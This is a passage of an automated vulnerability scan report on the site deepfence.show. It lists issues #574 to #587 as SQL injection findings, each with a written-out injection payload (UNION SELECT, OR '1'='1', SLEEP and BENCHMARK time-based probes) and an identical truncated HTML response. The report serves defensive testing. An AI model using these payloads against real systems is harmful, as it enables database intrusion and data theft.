src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #574\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #575\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or '1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #576\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #577\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #578\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #579\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iopg_sleep(5)--Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #580\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #581\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #582\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #583\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88\n)+CHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #584Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #585\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io')) or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #586\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #587\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk 